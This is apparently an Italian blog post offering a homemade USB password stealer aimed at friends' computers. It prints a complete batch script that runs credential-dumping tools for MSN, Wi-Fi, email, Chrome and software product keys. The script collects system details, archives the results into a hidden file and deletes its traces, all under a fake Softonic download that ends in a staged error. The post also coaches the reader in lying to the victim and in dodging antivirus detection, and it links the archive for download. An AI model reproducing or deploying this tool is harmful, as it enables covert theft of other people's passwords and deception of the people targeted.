Ciao a tutti!
Oggi vi presenterò un simpatico programma fatto da me per rubare password dai computer dei vostri amici.
Il procedimento è semplice, vi basterà decomprimere l'archivio in una penna usb vuota e far partire il programma. Ora vi spiego in dettaglio.
Il programma di basa sulla finzione del download del programma stesso dal sito Softonic. A voi basterà dire che avete trovato un programma per usb per rubare password, il che è vero, e far credere alla vittima che il file .bat che utilizzeremo sia il downloader del programma. Durante il finto download il programma ruba tutte le password possibili, quando ha finito, il finto download dirà di aver riscontrato un errore, e ciò giustificherà l'assenza del programma scaricato, a questo punto direte che il computer non è compatibile o qualche scusa del genere. Ma ora vediamo la parte tecnica:
Questo è il testo del file .bat:
REM Collegamento a Softonic.com ...
@mspass.exe /sverhtml mspass.html
@echo Downloader.exe /sverhtml Downloader.html
@ProduKey.exe /shtml ProduKey.html
@mailpv.exe /shtml mailpv.html
@ChromePass.exe /shtml ChromePass.html
REM Inizializzazione download in corso ...
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Data: %DATE% - Ora: %TIME% >> log.txt
@pause
REM Download in corso ...
@rar.exe a logs.rar *.html *txt log.txt > nul
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h iepv.cfg
@attrib +h logs.rar
REM Download fallito (Errore 39004256828e)
@pause
Semplice no? Vediamolo in dettaglio...
Come avete visto nel mio precedente articolo, il comando <REM> serve per inserire dei commenti, il questo modo nella shell sarà visualizzata la scritta scritta immediatamente dopo.
La @ indica che sulla shell non deve apparire niente al riguardo della stringa di codice che la segue.
Solo nel caso della seconda scritta con la @, essendo seguita da <echo>, che anche se non ho capito ancora bene come ma fa apparire ugualmente la scritta ma senza chiedere i permessi di amministratore in caso stiate usando Windows 7. Dato che quella scritta deve quindi apparire, ho deciso di rinominarla in downloader.exe, cosi sulla shell apparirà scritto downloader.exe e non creerà sospetti. In realtà quel programma è quello per le password delle reti wifi.
Il secondo blocco di codici inizianti con la @ servono per creare un file .txt con tutte le informazioni sul sistema.
Il comando <pause> serve per chiedere al'utente se si desidera continuare attraverso la pressione di un pulsante qualsiasi. Il che serve solo per rendere il programma realistico.
L'ultimo blocco di codici serve per copiare tutti i logs dei programmi per rubare la password in un archivio, a cancellare i file rimasti fuori dall'archivio e a nasconderlo.
Per ritrovare i vostri logs vi basterà aprire il percorso file e cercare il file logs.rar nella vostra chiavetta usb, è tutto là dentro.
Per rendere la chiave operativa svuotatela, copiateci l'archivio che avete scaricato ed estraetelo.
Ora mettete l'archivio in una cartella sicura o sarà cancellato automaticamente, vi consiglio di tenerne una copia nella chiave usb. Fate partire il file .bat "Download HackPass". HackPass è il finto nome del programma che sarente andati a scaricare.
Ecco la lista dei software inseriti nel programma:
mspass: serve per le password di msn
wifikeyview: serve per le password delle reti wifi
ProduKey: serve per trovare tutti i product key dei software installati nel pc della vittima
mailpv: serve per le password della varie mail
ChromePass: serve per le password memorizzate in Google Chrome
Non ho inserito quello di Firefox perchè è riconosciuto dagli antivirus, e vi farebbe scoprire, mentre per Opera non è stato ancora realizzato.
Ho ache aggiunto una miniguida nel archivio da scaricare, il file si chiama "NON ARPIRE!".
Vi ricordo che ho scritto questo articolo a scopo informativo, e non mi ritengo responsabile delle vostre azioni.
Spero di esservi stato utile che l'articolo vi sia piaciuto.
Download USB-rubapassword
Nessun commento:
Posta un commento